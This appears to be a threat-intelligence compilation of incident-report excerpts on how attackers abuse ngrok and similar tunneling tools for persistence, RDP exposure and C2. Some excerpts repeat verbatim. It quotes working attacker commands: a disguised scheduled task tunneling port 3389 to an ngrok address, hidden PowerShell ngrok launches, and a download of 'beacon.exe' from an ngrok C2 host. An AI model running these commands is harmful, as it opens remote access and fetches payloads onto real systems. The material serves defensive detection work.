Ngrok

It is a common technique to leverage third-party legitimate software for malicious purposes (T1588.002), which makes detecting and attributing APT activity more difficult.

Scheduled task located that binds a pre-defined ngrok URL via TCP protocol using port 3389 Task name > MicrosoftSync Task action > C:\Windows\Temp\rk\ngrok.exe Task argument > tcp –region=us –remote-addr=3.tcp.ngrok.io:25126 3389

ngrok runs at the command-line level; potential parent processes include: CMDline parameters ... PowerShell executes the ngrok application and binds the TCP port 3389

A PowerShell script like https://github.com/benyG/Invoke-Ngrok/blob/master/Invoke-Ngrok.ps1 can be leveraged by threat actors to drop and execute ngrok in a scripted fashion.

Scheduled task located that binds a pre-defined ngrok URL via TCP protocol using port 3389 Task name > MicrosoftSync Task action > C:\Windows\Temp\rk\ngrok.exe Task argument > tcp –region=us –remote-addr=3.tcp.ngrok.io:25126 3389

On several infected machines, the ngrok utility was found in the directory with the Loki loader. In other cases, instances of the gTunnel utility were discovered running in the context of the svchost.exe and runtimebroker.exe system processes.

Sophos XDR detected the threat actors using the service manager tool nssm.exe... to create the malicious service ‘sysmon,’ which executed sysmon.exe and launched tunneling tools such as Ngrok or Ligolo-ng

Scheduled task located that binds a pre-defined ngrok URL via TCP protocol using port 3389 Task name > MicrosoftSync Task action > C:\Windows\Temp\rk\ngrok.exe Task argument > tcp –region=us –remote-addr=3.tcp.ngrok.io:25126 3389

On several infected machines, the ngrok utility was found in the directory with the Loki loader. In other cases, instances of the gTunnel utility were discovered running in the context of the svchost.exe and runtimebroker.exe system processes.

Sophos XDR detected the threat actors using the service manager tool nssm.exe... to create the malicious service ‘sysmon,’ which executed sysmon.exe and launched tunneling tools such as Ngrok or Ligolo-ng

To avoid detection, the attackers disguised their malware and tasks under the names of existing products or services

The threat actor used FRPC ( frpc.exe ) daily as reverse proxy, tunneling RDP over TLS. The FRPC ( frpc.exe ) task name was lpupdate and ran out of Input Method Editor (IME) directory. In other events, the threat actor has been observed hiding activity via ngrok.

powershell.exe /c Start-Process -WindowStyle Hidden -FilePath ngrok.exe -ArgumentList 'tcp 3389'

In this example, the threat actor attempted to download ngrok... $c = "whoami"

For this purpose, Scattered Spider established persistence using VPN access or Remote Monitoring and Management (RMM) tools.

After gaining access to the victim’s infrastructure, the attackers used the Remote Desktop Protocol (RDP) to move laterally.

Vultur still contains the remote access functionality using AlphaVNC and ngrok that it had back in 2021... the latest edition still includes the ability to remotely access the infected device through AlphaVNC and ngrok.

expose remote desktop service ports, like RDP and WinRM, to the open internet

wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip -Outfile C:\Windows\Temp\s.zip ; Expand-Archive -Path C:\Windows\Temp\s.zip -DestinationPath C:\Windows\Temp\rk\

Upon launch, it connected to the C2 server, allowing the operator to execute commands on the compromised host... Cloudflared tunnels traffic through the Cloudflare network.

PowerShell invokes ngrok to communicate to a C2 server to retrieve malicious payload and write to disk powershell.exe /c (new-object System.Net.WebClient).DownloadFile('http://2f65dfe21ccb.ngrok.io/b3.exe','C:\tmp\beacon.exe')

Usage of the third-party tunneling tool Twingate... Tailscale, Ngrok, WsTunnel, Rsocx, and Socat.

The attackers used various dual-use and living-off-the-land tools for numerous purposes, including... Ngrok for network tunneling

Throughout the activity the usage of multiple legitimate services was observed... transfer.sh pastebin.com webhook.site ufile.io raw.githubusercontent.com

A PowerShell script like https://github.com/benyG/Invoke-Ngrok/blob/master/Invoke-Ngrok.ps1 can be leveraged by threat actors to drop and execute ngrok in a scripted fashion.

svchost.exe is the remote access application AnyDesk. Attackers use this to remotely control the compromised machine.

The threat actor used FRPC.exe to tunnel RDP over port 443. The threat actor has also been observed using ngrok for tunneling.

ADVSTORESHELL exfiltrates data over the same channel used for C2... Agrius exfiltrated staged data using tools such as Putty and WinSCP, communicating with command and control servers... numerous malware and groups sent victim data, files, credentials, or host information over existing C2 channels.